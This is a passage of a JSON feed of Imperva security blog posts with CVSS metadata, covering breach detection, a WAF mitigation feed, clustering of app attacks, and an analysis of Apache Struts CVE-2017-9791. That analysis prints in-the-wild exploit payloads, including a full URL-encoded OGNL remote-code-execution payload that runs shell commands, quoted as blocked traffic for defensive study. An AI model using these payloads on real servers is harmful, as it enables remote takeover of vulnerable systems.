your structured, semi-structured, and unstructured data to exfiltrate the sensitive information for which you are responsible. This can easily play a role in the data exfiltration process by acting as temporary storage or a proxy to transport the data from a secure environment to an unprotected environment and then to the outside. This is the essence of a data breach - a successful attempt to open the closet or \u201ccrack\u201d the safe and expose the sensitive personal data contained in it.\n\n## Two business trends make organizations vulnerable\n\n 1. **The need to integrate with external technology providers.** Some CISOs and their team members struggle to secure a business services environment, which becomes additionally challenging as business operations agility grows.\n 2. **The evolution of cloud computing.** As organizations transition to the cloud, they are using third-party cloud-managed computing environments and third-party SaaS services to accelerate the migration process.\n\n## Data breaches are far more common today because of third parties\n\nRelying on third party code and services providers means that an organization's information technology infrastructure is exposed to suppliers that do not have a robust data security strategy aligned with the organization\u2019s own. The risk becomes much greater as every third-party technology provider's security vulnerabilities, in effect, become yours.\n\nThe first step for CISOs and their security teams is to secure all sensitive data assets and gain complete visibility into all data repositories that are part of the organization's architecture. This includes legacy repositories deep in the architecture and new ones, in on-premises and cloud-managed environments. Even data repositories that you don\u2019t know exist yet. When you have that level of visibility, then you can evaluate vulnerabilities, figure out who should have privileged access to the repositories and why, then optimize your detection and response process to deal with potential breaches.\n\n## General data breach attack flows\n\nMost data breaches have common characteristics, no matter the details of the breach. First, the attacker needs to penetrate the organization's IT (Information Technology) or OT (Operational Technology) environments, look around and find the asset of interest that it can take.\n\n### Examples of Early Signs of a Data Breach\n\n**Signs in critical stages:**\n\n**Reconnaissance:**\n\n * System tables scan\n * Massive database scan\n * Multiple login attempts\n\n**Exploitation:**\n\n * Open command shell\n * Machine takeover\n\n**Data Access:**\n\n * Service account misuse\n * Retrieving high numbers of records\n * Accessing business-critical data\n\n**General Signs:**\n\n * Work/activity in unusual hours\n * Use of dynamic SQL\n\n## Data breach attacker types\n\n### Hit & Run\n\nThis \u201cOpportunist\u201d identifies an opportunity; whether it is a vulnerability, a publicly open database, or something else. The bad actor decides to take what they can and leave. This kind of attacker will not try to search for other databases or penetrate the organization\u2019s network, or try to execute exotic exploits, etc. They will just take what they can, and then sell it to the highest bidder.\n\n### The Curious\n\nThis attacker usually sets out with a purpose, but may decide to look deeper. They may look around a little bit, but not too much. They are still focused on their original purpose, malware deployment, data exfiltration, etc.\n\n### The Resident\n\nThe most dangerous type, as in the \u201cEquifax\u201d breach, the Resident will gain access to the organization\u2019s network and will stay for months, sometimes years. They will use keyloggers, sniffers, and other methods to steal credentials and compromise databases, using \u201c[Low and Slow](<https://www.imperva.com/blog/the-account-takeover-threat-a-by-the-numbers-breakdown/>)\u201d and other methods to stay undetected.\n\n## Common data breach attack examples\n\nThe attacks that cause the greatest damage are \u2018The resident\u2019 attacks. Let's consider some examples to understand how these attacks are forged.\n\n### The resident attack\n\nInfosec disasters are typically the result of multiple failures. Invariably, post-breach analysis reveals several security weaknesses that allowed attackers to steal terabytes of information from supposedly secure systems.\n\nThere are several well-known, high-impact incident reports, such as Equifax, Anthem Inc., and the U.S. Office of Personnel Management that describe pre-breach progressions falling under this category.\n\n### Typical attack flow\n\n 1. The initial hack is done via a web-facing application, one example can be the Equifax customer complaint portal and its CVE-2017-5638 vulnerability. **ThreatPost:** _\u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638.\u201d_\n 2. Attackers exploit weaknesses in the company's security posture, notably the lack of proper segmentation.\n 3. In almost all major breaches, a lack of continuous security patching of servers and databases contributes to the attack\u2019s success.\n 4. Unpatched servers and databases provide the resident attacker room to operate freely within the company's network for a protracted amount of time.\n 5. In almost all these attacks, the intruders were in the company\u2019s environment for months, customizing their attack tools over and over again until the sensitive data was successfully compromised.\n\n### Ransomware attack\n\nThis type of attack is designed to disable critical systems or prevent sensitive data access by privileged users until a specified amount of money is paid. Ransomware attacks have become more and more sophisticated. They typically involve:\n\n1\\. Penetrating the organization's IT environment\n\n * Malware installed on an endpoint operating system via a phishing attack.\n * Account Takeover (ATO) attacks use stolen credentials to penetrate the organization\u2019s environment.\n\n2\\. Analyzing network resources to allocate databases that hold personal, financial, or business-critical information.\n\n3\\. Making the original data stored unusable by:\n\n * Encrypting the data.\n * Extract data either to a hidden file in the network or outside.\n * Modify data values stored.\n\n### Ransomware attack detection example\n\nIn this attack, the data is moved from the original database to a readme file.\n\nDB breach flow:\n\n 1. Attacker query for databases list.\n 2. Attacker selects prod_db.\n 3. Data is being stolen from prod_db using the 'select'.\n 4. Prod_db is being deleted using 'drop'.\n\n## How should organizations protect their home environment\n\nImperva research shows that much like using a safe at home, when organizations secure their data repositories with a data-centric security fabric, and when a hostile penetration occurs, they dramatically reduce data exfiltration risk by turning all open repositories into well protected alarmed enabled safes. This shortens the path from breach to detection to response.\n\nAs business innovation and the services that support it are digitally transformed, the perimeter boundaries have blurred. The \u201cwalls\u201d that protect data repositories have cracks that allow attackers to put their hands on sensitive data, effectively ending the days of protecting assets within the network perimeter. The security of an organization is only as strong as the weakest link in the security chain. In many cases, better architecture and cross-organization security practices would do the trick, but those practices are not easy to implement and control, nor do they account for the risks presented by third-party technology providers. You must secure all the data repositories they manage, not just the applications and networks that surround them.\n\nThe cause of most breaches is the lack of an in-depth data security strategy. As we discussed before, you can reduce the attack surface by securing your data repositories, but you must gain visibility into them. Next, eliminate excessive privileges from key users and deploy strong authentication mechanisms. Never forget that securing data repositories is a never-ending process, you must always work toward optimizing your security architecture, policies, and practices, both for your assets and employees. Continuously performing data discovery and classification to locate sensitive personal data is a great way to maintain an enterprise-grade data security strategy and eliminate bad practices inside on-premises and cloud-managed environments. Together with implementing [Imperva\u2019s Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and [Imperva Data Security Fabric](<https://www.imperva.com/products/data-security-fabric/>), it is possible to protect against most potential data breach scenarios.\n\n## On-Demand Webinar: Detecting Attacks on Your Data. How can we do it right?\n\n[Watch now.](<https://community.imperva.com/events/event-description?CalendarEventKey=afb10612-12cf-4e6d-9fe6-b3a4486a966f&CommunityKey=39c6092a-d67a-4bc2-8134-bfbb25fc43af&Home=%2fevents>)\n\nSecurity Analytics are an essential part of the toolkit to protect against data breaches. Are you using Imperva Data Risk Analytics (DRA)? Imperva Data Risk Analytics tools have been purpose-built to recognize threats such as suspicious data access or signs of potentially compromised accounts. But did you know Imperva recently added new features that can recognize the attack signatures of active exploits so you can be instantly notified of an attack in progress?\n\nIn this webinar, Product Manager Oren Graiver, will describe how you can use [Imperva Data Risk Analytics](<https://www.imperva.com/solutions/user-behavior-analytics/>) to augment Imperva vulnerability assessment and data activity monitoring and transform your security posture to proactively prevent data compromise incidents. Topics covered will include:\n\n * Where breaches are found\n * Understanding data breach detection\n * Early signs of a breach\n * Kill chain and data compromise\n * Real life example of a breach DRA can detect - Ransomware\n * What\u2019s on the roadmap?\n\n[Watch the webinar today](<https://community.imperva.com/events/event-description?CalendarEventKey=afb10612-12cf-4e6d-9fe6-b3a4486a966f&CommunityKey=39c6092a-d67a-4bc2-8134-bfbb25fc43af&Home=%2fevents>).\n\nThe post [Two New Trends Make Early Breach Detection and Prevention a Security Imperative](<https://www.imperva.com/blog/two-new-trends-make-early-breach-detection-and-prevention-a-security-imperative/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-31T13:47:34", "type": "impervablog", "title": "Two New Trends Make Early Breach Detection and Prevention a Security Imperative", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2022-08-31T13:47:34", "id": "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "href": "https://www.imperva.com/blog/two-new-trends-make-early-breach-detection-and-prevention-a-security-imperative/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-26T20:41:18", "description": "We previously reported that the overall number of new web application vulnerabilities in 2017 showed a 212% increase from 2016\u2019s 6,615 to a whopping 14,082. This spike was due, in part, to high-profile vulnerabilities like Heartbleed, Shellshock, POODLE, Apache Struts 2 and more recently, Meltdown and Spectra.\n\nThere is, however, good news in the form of a new tool tasked with pushing mitigations for high-profile vulnerabilities like these to the SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>) within a matter of hours.\n\n## Ongoing Vulnerability Protection\n\nTasking your security team with analyzing each and every vulnerability, deciding their relevance and applying the necessary mitigations is near impossible, which is why [virtual patching of your WAF](<https://www.imperva.com/blog/2017/03/deploy-instant-virtual-patching-on-securesphere-waf-with-highly-accurate-web-vulnerability-data/>) is so important. Not updating your WAF regularly is like wearing your old 80s jeans thinking you\u2019re still cool\u2026you\u2019re not. Imperva regularly releases mitigations for new vulnerabilities.\n\n> In today\u2019s tech landscape, where constantly up-leveled cyberattacks are one of the most prominent threats to corporate assets, timing is everything.\n\nOnce a [vulnerability is published](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) it\u2019s only a matter of time until attackers will exploit it. It only takes a few hours for high-quality code snippets to be published and by then, every script-kiddy has had the opportunity to run them against whomever they choose. In the case of a [2017 Apache Struts vulnerability](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), for example, an official exploit was made public one day after the vulnerability was announced. Clearly, updating mitigations only once every few weeks is not enough.\n\n## The Answer: An Emergency Feed\n\nImperva has incorporated an emergency feed into our ThreatRadar subscription service as an extension of our WAF, which allows Imperva security researchers to push mitigations for high-profile vulnerabilities to the WAF in just a matter of hours. Our goal is to push mitigations via the emergency feed in no less than 24 hours from the time of the vulnerability\u2019s publication, so whether a new vulnerability hits the landscape in the middle of the night or your entire security team is on vacation, your WAF estate is protected.\n\n## So, how do we do it?\n\nTo apply mitigation through the emergency feed, a vulnerability must be remotely exploited, operational without authentication and have the potential to be highly impactful. In these cases, Imperva researchers analyze the vulnerability, understand its scope, and create the appropriate mitigation. The mitigation is then run through a wide set of Incapsula and SecureSphere customers, on real-world data, to observe its false positive rate and search for the vulnerabilities\u2019 variations. Only when our researchers are convinced that the new mitigation is stable and reliable will they push it into the emergency feed.\n\nSimply put, in just a few hours, all of Imperva\u2019s customers on Incapsula and SecureSphere WAFs are fully protected. The best part? There\u2019s no action required by your in-house security team. As soon as they\u2019re back in the office they have access to a report summarizing the nature of the vulnerability and the mitigation applied.\n\n## Included with ThreatRadar Subscription\n\nIf you\u2019re a SecureSphere customer with a [ThreatRadar](<https://www.imperva.com/products/threatradar-intelligence/>) subscription, the emergency feed is included and takes only a few clicks to enable. Incapsula customers receive this service out of the box \u2013 no registration required.\n\nFor SecureSphere customers with ThreatRadar subscription:\n\n 1. Check the **Emergency Feed** box on the customer portal to register.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/Emergency-Feed-1.png>)\n\n 1. In the Imperva SecureSphere WAF dashboard, enable the **Emergency Feed services** under the ThreatRadar tab.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/Emergency-Feed-2.png>)\n\nThat\u2019s it. The emergency feed is enabled and will begin receiving new mitigations immediately. With each content update, our researchers will remove the most recent mitigations from the emergency feed and permanently add them to your SecureSphere WAF, so your system is updated. You will be notified of updates via email.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-04-26T19:01:59", "type": "impervablog", "title": "Keeping Your WAF Relevant: Emergency Feed Pushes New Mitigations in Just Hours", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-04-26T19:01:59", "href": "https://www.imperva.com/blog/2018/04/keeping-waf-relevant-emergency-feed-pushes-new-mitigations-just-hours/", "id": "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-14T02:18:38", "description": "On July 7th, a new security vulnerability was published in Apache Struts 2 CVE-2017-9791 (S2-048[1]). Struts 2.3.x users with Struts 1 plugin, which includes the Showcase app, are vulnerable.\n\nOnce again, this vulnerability enables a Remote Code Execution (RCE), which is the most commonly exploited Apache Struts vulnerability. In this case, as in many other cases of RCE in Apache Struts, the attacks observed in the wild are also carried in the form of Object-Graph Navigation Language (OGNL) expressions.[2]\n\nLike the recent Struts 2 RCE [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>), Imperva customers are protected against current variations of the attack using the zero-day attack detection mechanism in either SecureSphere or Incapsula. The zero-day attack detection mechanism protects against malicious traffic regardless of a specific web exploit.\n\n## The Vulnerability\n\nBased on [Apache release notes](<https://cwiki.apache.org/confluence/display/WW/S2-048>), \u201cit is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user\u201d. The message presented to the user is processed by the \u201cActionMessage\u201d routine and returned back to the user by the \u201cmessage\u201d function as follows:\n \n \n messages.add(\"msg\", new ActionMessage(**the_message**));\n\nLacking proper validation before execution, the message (the_message) processed by the server may potentially cause a remote code execution. To fulfill its execution potential, a remote entry point is required for the message. Following the route of the vulnerable code leads to this location:\n \n \n /struts2-showcase/integration/saveGangster.action\n\nPoking around the webpage reveals several inputs controlled by the user, including name, age, and description (see Figure 1):\n\n\n\n_Figure 1: Vulnerable Apache Struts application_\n\nWhen submitting the \u201cGangster\u201d data the server processes the user\u2019s input with the vulnerable \u201cActionMessage\u201d routine and returns a message to the user (see Figure 2):\n\n\n\n\n\n_Figure 2: Request to the vulnerable page and result_\n\nAs can be observed, the processed message is integrated with the user\u2019s input data (\u201c_Gangster a added\u2026_\u201d) which means now the input data can be modified to include arbitrary code execution (see Figure 3). For instance, the RCE payload can add a custom header to the response message or use an OGNL mechanism to run malicious code (see the second payload in \u201cAttacks in the Wild\u201d section):\n\n\n\n_Figure 3: Exploitation of the vulnerable application_\n\n## Imperva Zero-Day Protection\n\nAs mentioned earlier, Imperva customers are protected against this new Apache Struts vulnerability using zero-day detection mechanisms from either SecureSphere or Incapsula, which detect incoming traffic with malicious content, regardless of a specific vulnerability or exploit.\n\nThe zero-day detection technique prevents the new attack using two complementary deterrence layers:\n\n * First, since the exploit includes an arbitrary remote code to be executed, customers are protected out-of-the-box to most attack variations using a generic Remote Command Execution mitigation mechanism (see Figure 4):\n\n\n\n_Figure 4: SecureSphere blocking a generic RCE_\n\n * Then, in the second layer of defense, SecureSphere and Incapsula both detect potential OGNL expressions which are used to manipulate Java objects, and are commonly used by attackers to inject remote code in vulnerable Apache Struts servers, including in this attack (see Figure 5):\n\n__\n\n_Figure 5: SecureSphere blocking a generic OGNL-based RCE_\n\nNevertheless, to be on the safe side, a few hours following the release of this critical vulnerability our security teams published a dedicated mitigation guideline and virtually patched Imperva customers.\n\n## Attacks in the Wild\n\nAn increasing amount of attack attempts have been seen since the publication of this new Struts vulnerability, mostly as hard copy replication of PoCs published shortly after the first announcement, and refer to reconnaissance attempts to track vulnerable servers. Below are details on two common payloads seen in the wild.\n\n### Payload #1: Custom Header Insertion Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **${#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-BIGSCAN-Test','fe9a40f002fe11e7b4ef0242c0a8050\u2032)}** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nHTTP headers are easily parsed and extracted with automated scripts, therefore validating the existence of a new custom HTTP header is very straight forward for the attackers to implement and can be used as a reconnaissance request before the actual attack \u2013 i.e., the actual RCE which will take over the server.\n\nIn most cases attackers will use this kind of reconnaissance as part of a vulnerability scanning tool on predefined IPs range, facilitating bots to effectively scan a wide range of addresses. Based on our classification analysis, IPs that were registered in this attack are known to generate mostly bot traffic (~96%).\n\n### Payload #2: OGNL Expression Execution Attempts\n\n**Part of a blocked HTTP request carrying CVE-2017-9791 RCE exploit** \n--- \n**HTTP Method:** | POST \n**POST Body:** | **%7b%28%23szgx%3d%27multipart%2fform-data%27%29.%28%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3f%28%23_memberAccess%3d%23dm%29%3a%28%28%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d%29.%28%23ognlUtil%3d%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3d%27echo%20891549112%27%29.%28%23iswin%3d%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3d%28%23iswin%3f%7b%27cmd.exe%27%2c%27%2fc%27%2c%23cmd%7d%3a%7b%27%2fbin%2fbash%27%2c%27-c%27%2c%23cmd%7d%29%29.%28%23p%3dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3d%23p.start%28%29%29.%28%23ros%3d%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2c%23ros%29%29.%28%23ros.close%28%29%29%7d** \n**URL:** | /struts2-showcase/integration/savegangster.action \n \nDecoding the URL\u2019s payload injected to the name parameter unveils the following RCE (see Figure 6):\n\n\n\n_Figure 6: OGNL-based RCE (URL Decoded)_\n\nThe payload in this case refers to an attempt to execute OGNL expression, as an entry point to the attack. Again, in this case it is only a reconnaissance attempt before the attack, in which the attacker echoed a random generated number \u201c89159112\u201d to match when processing the response message.\n\nIt will be interesting to monitor the trending exploits over time and to see if and how the reconnaissance trend gradually shifts to actual exploitation attempts of these servers.\n\n## Stay Protected\n\nBased on the official [advisory](<http://seclists.org/oss-sec/2017/q3/92>) this vulnerability does not affect applications using Struts 2.5.x series or applications that do not use the Struts 1 plugin. Meaning that an update is required for those who use the earlier vulnerable patches. It is also mentioned that even if the Struts 1 plugin is available while excluding certain code parts, the application is safe.\n\nAn alternative to the formal advisory, which could be costly and time consuming, is [virtual patching](<https://www.owasp.org/index.php/Virtual_Patching_Best_Practices>). Instead of leaving a web application exposed to attack while attempting to modify code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nIn addition to virtual patching, zero-day detection mechanisms such as those mentioned above protect sites by detecting and blocking new strains of attack prior to its release without any modification to systems.\n\nLearn more about protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).\n\n[1] <https://cwiki.apache.org/confluence/display/WW/S2-048>\n\n[2] <https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-07-13T19:12:31", "title": "CVE-2017-9791: Analysis of RCE in the Struts Showcase App in Struts 1 Plugin", "type": "impervablog", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-5638"], "modified": "2017-07-13T19:12:31", "href": "https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/", "id": "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-20T00:15:21", "description": "In the previous blog posts in this series, we discussed the motivation for clustering attacks and the data used and how to calculate the distance between two attacks using different methods on each feature we extracted. In this final blog post, we\u2019ll discuss the clustering algorithm itself \u2013 how to use the distance we calculated to create clusters from the data. We will discuss clustering in real time when only a small amount of data can be stored in memory. Finally, we\u2019ll show some results of the algorithm based on real data from Imperva customers.\n\n## Choosing a (realtime) clustering algorithm\n\nNow we have all the basic ingredients to input into the algorithm. What\u2019s left to decide is which clustering algorithm to use. There are many algorithms to choose from that meet varying needs, for example, we\u2019ve previously written about [clustering](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) techniques used in Imperva CounterBreach.\n\nHere\u2019s where the algorithm reality punched us right in the face: the demand from our engineering team was that the **clustering is done in** **real time**. Meaning each time a new event enters the system the algorithm needs to decide on the spot how to cluster it and update the current clustering state. This had been done with minimum memory, which meant that individual events could not be stored in memory.\n\nThe more popular and well-known clustering algorithms work on a batch of data instead of a stream, i.e., their input is a static dataset. So, this real-time requirement meant we had to look for other algorithms that work in streaming mode.\n\nThere are a [couple of methods](<https://en.wikipedia.org/wiki/Data_stream_clustering>) to use to cluster a stream of data. We won\u2019t discuss these methods as they are more complex and technical, instead, we\u2019ll present the requirements of our algorithm and what was needed for them to be met.\n\n## Clustering requirements in streaming mode\n\nFirst, a clustering algorithm in streaming mode needs to make decisions in real time, meaning that the algorithm maintains in memory a current state of the clusters and each time a new event enters the system the algorithm updates the clustering state. This is done instantaneously and without storing the discrete event in memory.\n\nSecond, we need to remember that each time the algorithm was making a decision it was doing so based on partial data. That\u2019s because the algorithm only processed past data. If the algorithm were to know **all **of the events (past and future events) the decision it would make might be different. So, the algorithm must have a way to **undo decisions** it made in the past. The way the algorithm undoes its decisions is by splitting a cluster into smaller parts and merging the parts together into other clusters that are the best fit.\n\nFinally, most of the streaming clustering algorithms from academic articles work on spatial data. This means that their input are points in a Euclidean space (think of it as coordinates in an n-dimensional space). Our data is more complex, it contains URLs which are strings, IPs, geographic coordinates and other varying features. These features cannot be easily embedded into a Euclidean space, and even if they would it would make no sense to do so. So, the algorithm we needed must assume only that we can calculate the distance between two data points, and not that they are embedded into a Euclidean space.\n\nWe used a homegrown algorithm to answer these needs. Clustering in streaming mode is always a trade-off between accuracy of the results and the time and memory efficiency. We tried to find the balance so the result would be as accurate as possible storing only the minimum amount of data needed in memory while performing the least possible amount of calculations with each incoming event. See Figure 7 for the general flow of clustering in streaming mode.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/05/Clustering.png>)\n\nFigure 7: Clustering in streaming mode - clusters may change due to new events entering the system\n\nWe stored aggregated structured data in memory instead of raw events; this way we were able to split clusters, to some extent, and rearrange them as would seem most appropriate. Also, in order to process data in real time, most of the time we used a light-weight distance function that wouldn\u2019t take too much time to calculate and didn\u2019t consider all the features. We used a heavier and more accurate distance function that considered all the features only at predefined times when there were enough new events that entered the system, as we expected the clustering state might change significantly.\n\nAlso, for performance considerations, we couldn\u2019t cluster all the events from the beginning each time a new event entered the system. That\u2019s why every time a new event came in the algorithm used its current clustering state to do calculations only on the clusters that may change due to the new event. This way we significantly reduced the time it took to process each new event.\n\n## Results of the algorithm: Customer use cases\n\nFor validation of the algorithm, some of our web application firewall (WAF) customers provided us with logs containing events from their WAF. Here are three highlighted clusters which contain incidents we thought were interesting:\n\n### Nginx integer overflow\n\nCVE-2017-7529 is a vulnerability of Nginx that allows an attacker to launch an integer overflow attack using a crafted \u201crange\u201d header. We saw a cluster on a customer\u2019s WAF containing over two thousand attacks from over 100 distinct IPs over a period of three days trying to exploit this vulnerability. Over 80% of the attacks came from the US and most of the attacks seemed to use the same attack tool. Also, the attack targeted many different URLs, although it targeted only two resource extensions: PDF and CFM.\n\n### Email harvesting\n\nEmail collector robots try to scrape web applications to find email addresses. The purpose for email harvesting is mostly to collect lists of emails in order to sell them to spammers. We saw a cluster on a customer\u2019s WAF which contained over 50 distinct IPs that performed email harvesting. The source of these attacks was very distributed, from the US, Europe, South America and Asia. Most of the targets were the home page of the application. This means that after the robots were blocked at the home page they didn\u2019t proceed to scrape the rest of the site, probably moving on to try other websites which are not protected by a WAF. The same cluster was also found in more than five different web applications we analyzed indicating this is a popular attack.\n\n### Attacks on Apache Struts vulnerabilities\n\nIn [previous blog posts](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) we discussed Apache Struts vulnerabilities, and how they are very popular among attackers, especially ones from Asian countries. [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) is an Apache Struts vulnerability published on March 2017 that allows attackers to launch remote code execution attacks using a crafted \u201ccontent-type\u201d header. We saw a cluster of attacks trying to utilize this vulnerability; most of the attacks came from China and the target was very distributed, containing multiple URLs. Also, in addition to this specific vulnerability, the attackers tried to utilize other vulnerabilities of Apache Struts. This is a popular phenomenon we see in our data: attackers trying to utilize different vulnerabilities of the same system, in this case Apache Struts. The cluster appeared on over ten different web applications we analyzed, and all the clusters contained similar attributes. This indicates the popularity of Apache Struts vulnerabilities among attackers.\n\n## Conclusion\n\nClustering application attacks is a challenging task that requires a lot of research and experimentation. Throughout the process, we encountered many difficulties and made a number of decisions regarding the algorithm. Many due to real life constraints not seen in academic research. Customer applications don\u2019t live in a lab so the solutions that protect them can\u2019t either.\n\nKnowledge of the application security domain and a deep understanding of data are both \u2013 in our experience \u2013 crucial prerequisites for the design and implementation of any successful machine learning algorithm built to protect apps and the data that connects to them.\n\nLearn more about protecting apps from attacks with [Imperva SecureSphere](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) or [Imperva Incapsula](<https://www.incapsula.com/website-security/web-application-firewall.html>) Web Application Firewall.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2018-06-19T22:41:03", "type": "impervablog", "title": "Clustering App Attacks with Machine Learning Part 3: Algorithm Results", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-7529"], "modified": "2018-06-19T22:41:03", "id": "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "href": 